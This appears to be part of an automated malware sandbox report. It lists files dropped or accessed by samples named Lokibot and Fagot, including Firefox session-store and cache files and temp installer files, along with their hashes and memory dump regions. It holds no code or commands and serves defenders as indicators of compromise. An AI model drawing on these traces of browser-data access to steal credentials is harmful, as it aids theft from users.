| MD5 | 8565cee1d82661f7b37f2ed0919a6cf4 |
| SHA1 | ccefadd53c9c901908b14affc3456d3b18ee193b |
| SHA256 | f00cf2d6da93516e0def527482a4ed9428a3344c0b2d2fc2ffb18189ca6aaaa5 |
| SHA512 | 3b957367c2533cc9b08974d8bf53e1958e8cb1b4949e4fd9be8988002e429659f6c518886ef09ff4a056695d36ef4c72b53d56ca1df2d9c56fdc22f6facf8344 |
memory/6252-6577-0x0000000010000000-0x0000000010030000-memory.dmp
memory/7192-6580-0x0000000010000000-0x0000000010030000-memory.dmp
memory/3384-6583-0x0000000010000000-0x0000000010030000-memory.dmp
memory/2756-6584-0x0000000010000000-0x0000000010030000-memory.dmp
memory/2756-6587-0x0000000010000000-0x0000000010030000-memory.dmp
memory/4980-6601-0x0000000010000000-0x0000000010030000-memory.dmp
memory/4980-6604-0x0000000010000000-0x0000000010030000-memory.dmp
memory/1088-6607-0x0000000010000000-0x0000000010030000-memory.dmp
memory/6368-6608-0x0000000010000000-0x0000000010030000-memory.dmp
memory/6368-6611-0x0000000010000000-0x0000000010030000-memory.dmp
memory/5200-6614-0x0000000010000000-0x0000000010030000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 6a735172a4b32512c4d455b5914e256e |
| SHA1 | 827132975e4d4e3228c4ffca7a56feb3464b5c92 |
| SHA256 | b229fb976b6b132c43018df6e4c46bae3ce9252b2c5998f9f1041450f91c4e8c |
| SHA512 | 6bf6c4f1dcd3b9ff1fdb3a563e009bb67473e9739d5c20766b95ff232872d518befb9cdcda3c7cac8371b9cb5efa0f9af797b71b54274d4d745c6fffb6e1ef25 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 35bdf824573c76718db2b7d855e3ad1e |
| SHA1 | 5bf8d23568b42956dc320466a5e59f25309aa6fa |
| SHA256 | 5b089842821f3d745832564ee452b9563bf2916ef1241264e49ed67de583795d |
| SHA512 | 2f96e525e1bea7dbd314b0923d654e955f6fc29ce6e4b75e7a2c11a3731c0962427839ac40906eb58c99cd8f56178f86c31d0a3110a7f3668e9d57acd30268bb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 393149a54f30581bdba9035f53acc1e5 |
| SHA1 | 751c96dfbd96a78781f3d5f39522c9a9033c3cbe |
| SHA256 | 442d0a21c61a8669fd21a261f24bcb199705841fcede34683b9e1d084ba9d453 |
| SHA512 | 25679fad0d61102bd651b9321b36aaa64a8cd256e10b8172b79bf079ebf2dbbbb2f30e559dc9d3aa6e31084d30bc2cfd60f3ecb3c9bc255e244a06164122a3f0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 92ca038acb8c9777a7dc830b6d19efd7 |
| SHA1 | 95919dbf1c28cff2c07ab4988126b0964adddad5 |
| SHA256 | 75c19c53f603dfb69d82566e91e60a02876b12153a644c89d684fadea6274216 |
| SHA512 | c6475195b781a90b84f2cc5e0cecf722058f010ca0942a995f0a345a962c61fcf561be7adf353c93f5083fbd4b40b175d7c399fe1df4ad2677393aa076343fec |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\E82C79F80897EACFA36FD4EECCC130ED5F36FD6F
| MD5 | fdf6addad4eecb02adbe044ff30ed110 |
| SHA1 | 8fec1ebbf5b61bb1fb1660a892602a81329b5164 |
| SHA256 | 978326530e9a695d17e399662f4db002ba754030574b0b877baf5e12c3bfebb1 |
| SHA512 | 44436bc2af250c86a7a3c8d6f2e86308bf1c806daf782f7a37d8a5f513db4439b6bf67b84bf3b4213d35375755ac7a2681805104bc14e74e380c3754b1c4c3e4 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 63b4def712b1f505b5a69f8ef64f60ba |
| SHA1 | 326825f23dd8491f00d363fff2b78bbafd36ae47 |
| SHA256 | bed831f4faa1a34832e4e590066e0394c7e38cfbddb233b8cc66e05758af7fa8 |
| SHA512 | 9f0a2c79375d54223bfa5c5c0dff4e6faab6f0da0e47793e20dd84b26d87e7119dc25f56678f15e45e32d38acd6aa30b37bd8e47d4ff83e729a0788328e9dc93 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 8d729d72ace1bbf7d0a6504e42e3cef7 |
| SHA1 | 645462262393ae663c9aaa2b593f2e85b06b439c |
| SHA256 | a0220c992cbd545645836fd011883e119a097e27342f6fd20527fbff347923f7 |
| SHA512 | e63693392909f81f116ae8c30c3f8357927b6905ff6a18da8246eaddc6d5a26380ba5424ba6252bf277672cb7fd60d87df0c96ca372aebd05ccffaa0825d3fe1 |
C:\Users\Admin\Downloads\Lokibot.LK0n4mqN.exe.part
| MD5 | f52fbb02ac0666cae74fc389b1844e98 |
| SHA1 | f7721d590770e2076e64f148a4ba1241404996b8 |
| SHA256 | a885b1f5377c2a1cead4e2d7261fab6199f83610ffdd35d20c653d52279d4683 |
| SHA512 | 78b4bf4d048bda5e4e109d4dd9dafaa250eac1c5a3558c2faecf88ef0ee5dd4f2c82a791756e2f5aa42f7890efcc0c420156308689a27e0ad9fb90156b8dc1c0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 30dcc76490772708faad96220c9877db |
| SHA1 | db347fcade84e88f0fe6874e9b9e87d9bb0968c7 |
| SHA256 | 7678cc9ac61db328d1d34ffdcf64a91afc8172c767605d1b99632ecd860e2081 |
| SHA512 | e6ef163194bfdcbf3fa9f055bffca2ede38c9bd337ce89122518b0737c67819182a779a0aff389622249294501231351a50c4f4d89b786bcb5fec518a9b6f3f0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\downloads.json
| MD5 | c4f6aea142d7b5afe0eba1868d258c00 |
| SHA1 | 8c1a83dabc7ab989d1dfd82124a9d32d4c4801b4 |
| SHA256 | a4c591b992fbef49f8566a7be3c41e39cfd67076a0a95c1db9d5db1c639cbd0b |
| SHA512 | ffc04bd11b1f8625d6e13fbc4ab9da1eb7bdd7ef86db08364240d9d4aaf14b7a2703be6597dcf2661145d27e3f7f2335728736aa0015715c74b33ef268bf2c75 |
memory/6392-7062-0x0000000000A70000-0x0000000000AC2000-memory.dmp
memory/6392-7063-0x0000000002D90000-0x0000000002DA4000-memory.dmp
memory/6392-7064-0x0000000005AC0000-0x0000000006064000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | abf8d853e211477aba0d799cc35d9003 |
| SHA1 | a0a18b38651c3158501da5f18da5e13f51d03121 |
| SHA256 | 6ffbcb61300564f3078230186bf830ba820f2b68932449dc0f6055eaa1c78ea9 |
| SHA512 | ffd620c718d992f0dc4ac47e9376ce382fc5c32db1b4e7da3a83d96272168c08ebd392c66b87d22341bf42d73e70a143c86171f5f5be20e786dea1d3f0c77717 |
memory/6392-7071-0x00000000055C0000-0x00000000055C8000-memory.dmp
memory/6392-7072-0x0000000006210000-0x00000000062A2000-memory.dmp
memory/6392-7073-0x0000000006440000-0x0000000006448000-memory.dmp
memory/6392-7074-0x0000000006700000-0x0000000006744000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 03c0f949e8131b0815a7741e130765d6 |
| SHA1 | ddb1950968ed07f9ecab02db39e2581f184595fc |
| SHA256 | 746a9a79ccdc0fca706fc41834946481ef61b1ac4c21761838de7f967da8f15c |
| SHA512 | 87f7b83474057d77f4b584d1613e882043ba2e74d06e067f562618df3124ef4b759bad775acf5dc3c9b9adc64c8effe8fd3a1000f6422db1306e5d8b31b65557 |
memory/6392-7093-0x00000000066B0000-0x00000000066D2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\xulstore.json
| MD5 | d7a9c29a5421078a9135ccf1cade552a |
| SHA1 | e1b43108778d359d8d9287cf59225617e1769463 |
| SHA256 | bade20948c677d1d458e39a4cf6d8c4d8237263d55e63370d6272fa3243ffe28 |
| SHA512 | 49553b13fa1cc8d257f2ca9056742e6e11fbdce21633edeb5af6f863294f97ccf3cabe851d94bcedba03e2716311a48dcf8064eb1500f8a7c400b049bf48296f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | d9bd364a8650ab289fa441113dcf9edb |
| SHA1 | 3c62f4a76259e4854dbfd431ed04bbed809012d4 |
| SHA256 | ed06a53e6c13c622b0506171804355de8d8bf6ffe65b76923fe0f0833156567d |
| SHA512 | 971951871b14ca204b27966791d4b7da643365d5105340b7d6115ab927f6ab5b796413ff70deb35f9612871256805434971bbb6a043d9311236ac0fc97c1b7ae |
C:\Users\Admin\AppData\Local\Temp\MSIC06F.tmp
| MD5 | 6425466b9a37d03dafcba34f9d01685a |
| SHA1 | 2489ed444bce85f1cbcedcdd43e877e7217ae119 |
| SHA256 | 56f8ca5b2079bc97a7af9c015ed4b6163635baef0d9a287d19fc227fc330c53d |
| SHA512 | 62f4c79d165282db14b662d4242a065af4c8a642f2023032ab5a059e2d6001f0b80e9a0562989013acf01a80a67491be9b671e6bd99220cf9d4fb44a17719371 |
C:\Users\Admin\AppData\Local\Temp\{09EAD19A-804B-444F-B17C-15F8C5837E63}\BException.dll
| MD5 | a2d4928c9836812735b3516c6950a9ec |
| SHA1 | 01873285eec57b208fa2d4b71d06f176486538c8 |
| SHA256 | 79ca108d5c51259d8fb38ed1cfcc5a70e9cf67a5954e52a4339b39ff04fa20c8 |
| SHA512 | d03964a2bb597bf0fdefb787de3b462010c4cd02d286b16587a03b5228553a307d1b8f472c312e0d8bb53f21570aa5b112d85193cf42b83ef33fb7905855eba7 |
C:\Users\Admin\AppData\Local\Temp\{09EAD19A-804B-444F-B17C-15F8C5837E63}\Babylon.dat
| MD5 | caba4f92c996b698e7923ec7cf6d66f5 |
| SHA1 | 5af3f322dc56c85a1bc0f4a884dac1907d2efa7f |
| SHA256 | 04c4ee982e3838368579739fcc0da68b3770f34fc6e2f200dc1499bc3268f3af |
| SHA512 | f35f3a46b72c4a9b83de7ba1740b8cf2b4e32200dd43f687bf2f7ca16d4113b640d814525a5c4cb417aff66ed9cd5b03eac2b692396a332ce7613fa1564ec969 |
C:\Users\Admin\AppData\Local\Temp\{09EAD19A-804B-444F-B17C-15F8C5837E63}\VersionInfo.txt
| MD5 | 92b68ca751162552c347d760831c6bd1 |
| SHA1 | 8f7ff93ae85e965d402d0e114ed0abccf8e767fb |
| SHA256 | 13663bb607172b128e4b2940f250afbcd0e52ab9e92bf0dd3f3870330c85a5fb |
| SHA512 | 865246583fab1e3a2747869df9f75439276eab749a45a22bcf5629227629942c080b5929896cbc01849084ea58559bb07db744b9bccd68bf240c83cf6c647977 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\EADD8AD0D19BD56212728537973592A5A83C9F56
| MD5 | 563073e301784563a5e20c8ac5e76214 |
| SHA1 | 8b63508bbcbf8f21c26b26fa0cc4fd612c877e16 |
| SHA256 | 63301465fcc22aa45c2aa80f8e4ac036a7aa82bd64b17f42f0d452e83953d3f1 |
| SHA512 | cc912674f2902d804fca864b8109dd36dcbb95627ff73eca16ab82efa62666f55a738b92e4db35e255e578056d7f1dbef68e4dd6807d021a08622e1979f62ba5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\storage\default\https+++github.com\ls\usage
| MD5 | 4fba7a010b239501f5a1926c6772940e |
| SHA1 | 2925b22844803d583cd1c1a598376c6d21df87e6 |
| SHA256 | 47a3cb358404490efe6ee5ed05e5db4da97797ddac23eef46c750d477e34dc75 |
| SHA512 | 49e20e7e6132787d76986afb2b26246be31752d2e36cb80928f2485d766d9070503e18a9329406dd2e4a0e3e2876f56f80c9cb5b805368d8eb93930b9e02c16b |
C:\Users\Admin\Downloads\Fagot.5on2G-h6.a.exe.part
| MD5 | 30cdab5cf1d607ee7b34f44ab38e9190 |
| SHA1 | d4823f90d14eba0801653e8c970f47d54f655d36 |
| SHA256 | 1517527c1d705a6ebc6ec9194aa95459e875ac3902a9f4aab3bf24b6a6f8407f |
| SHA512 | b465f3b734beaea3951ff57759f13971649b549fafca71342b52d7e74949e152c0fbafe2df40354fc00b5dc8c767f3f5c6940e4ba308888e4395d8fd21e402b3 |
C:\Windows\SysWOW64\ntoskrnl.exe:Zone.Identifier
| MD5 | 740434ee7a635c53f6db72917da96488 |
| SHA1 | 3a748799af7c7af70a91b04dbed300f92fe0a6b5 |
| SHA256 | a81c9809b8ce94789c88d2a682dfa651c99e49eafd5b4418dabbeabfb9b74115 |
| SHA512 | 43f230f8483dc59df0ebf31da3137506a77d8f9f6afef48fc98a266a063ff5e15251ed73eb0dc7e21deb2fa0577fb6101399ae4daef005a568f8c4cf9fd74c5e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | a02e15c65c50ad5e4a24b376f9adcc17 |
| SHA1 | 251bab9b856426ece9ba206328208eaaf065c80d |
| SHA256 | bcbd46640e121a38c5b43a0f490252d007a00432cea417334290df84c073f541 |
| SHA512 | 9d2fdd05925b095bd30b79d10b53917608b78c570eb8ea0674e58db1676fe5ab9fb50d33068a006128968fd704f2395fbc4dc11b364d01714fe74a80642fb7c5 |